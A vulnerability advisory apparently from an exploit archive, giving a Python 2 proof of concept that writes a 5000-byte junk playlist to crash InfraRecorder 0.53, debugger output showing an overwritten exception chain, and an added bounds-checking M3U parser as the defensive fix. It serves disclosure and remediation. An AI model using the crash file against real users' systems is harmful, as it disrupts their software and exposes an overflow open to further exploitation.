###########################################################
[~] Exploit Title: InfraRecorder Memory Corruption Exploit [DOS]
[~] Author: sajith
[~] Version: 0.53
[~] Vulnerable app link: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
[~] Tested on Windows XP SP3, English
###########################################################

# Python 2 proof of concept: writes a single 5000-byte line of "A" into
# test.m3u; importing that playlist into InfraRecorder 0.53 crashes it.
raw_input("hit enter to fuzz")
print "poc by sajith shetty"
try:
    f = open("test.m3u", "w")
    junk = "\x41" * 5000
    f.write(junk)
    f.close()
    print "done"
except Exception, e:
    print "[+]error - " + str(e)

# Reproduce: Edit > Import > test.m3u
#
# Debugger output at the crash:
#
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00157980 ebx=00b60000 ecx=108b1175 edx=00410041 esi=00410039 edi=00000113
# eip=7c910efe esp=0012c828 ebp=0012ca48 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# ntdll!wcsncpy+0x99f:
# 7c910efe 8b39            mov     edi,dword ptr [ecx]  ds:0023:108b1175=????????
# 0:000> !exchain
# 0012ca38: ntdll!strchr+113 (7c90e900)
# 0012cab8: *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\InfraRecorder\infrarecorder.exe
# infrarecorder+ba5b0 (004ba5b0)
# 0012d07c: infrarecorder+10041 (00410041)
# Invalid exception stack at 00410041
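The crash above is the result of copying an unbounded playlist line (the exception chain ends at 00410041, which is the UTF-16LE encoding of "AA") into a fixed-size buffer during the M3U import. The following is an added example, not code from the advisory or from the InfraRecorder project, showing the defensive counterpart: an M3U reader that bounds entry length up front and reports oversized lines instead of copying them onward. The 1024-character limit and the sample playlist text are assumptions constructed for the example; the second sample is the same 5000-byte content the PoC writes to test.m3u.

```python
# Added example (not part of the original advisory): a bounds-checking
# M3U/M3U8 reader. Every line is length-checked before anything else is
# done with it, so an oversized entry is reported and skipped rather than
# handed to a fixed-size buffer.

MAX_ENTRY_LEN = 1024  # assumed bound; a real player sizes this to its own buffers


def parse_m3u(text, max_entry_len=MAX_ENTRY_LEN):
    """Parse M3U text into (entries, problems).

    entries  : list of (title, path) tuples for well-formed items
               (title is None when no #EXTINF preceded the path)
    problems : list of strings describing lines that were rejected
    """
    entries, problems = [], []
    pending_title = None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        # Length check comes first, before the line is parsed or stored.
        if len(line) > max_entry_len:
            problems.append("line %d: %d chars exceeds limit of %d, rejected"
                            % (lineno, len(line), max_entry_len))
            pending_title = None
            continue
        if line.startswith("#EXTINF:"):
            # "#EXTINF:<seconds>,<title>": remember the title for the next path
            _, _, rest = line.partition(":")
            _, _, title = rest.partition(",")
            pending_title = title.strip()
            continue
        if line.startswith("#"):
            continue  # "#EXTM3U" header or a comment line
        entries.append((pending_title, line))
        pending_title = None
    return entries, problems


# Constructed sample inputs for the example.
SAMPLE_OK = (
    "#EXTM3U\n"
    "#EXTINF:123,Some Track\n"
    "C:\\Music\\track.mp3\n"
    "D:\\other.wav\n"
)
SAMPLE_POC = "\x41" * 5000  # same content the advisory's PoC writes to test.m3u


if __name__ == "__main__":
    for name, sample in (("well-formed playlist", SAMPLE_OK),
                         ("PoC playlist", SAMPLE_POC)):
        entries, problems = parse_m3u(sample)
        print("%s: %d entries, %d rejected line(s)" % (name, len(entries), len(problems)))
        for p in problems:
            print("  " + p)
```

Run the script directly to see the well-formed sample yield two entries and the PoC sample yield zero entries and one rejected line. The important design point is the ordering: the length check runs before the line is interpreted, so no code path sees an entry longer than the agreed bound.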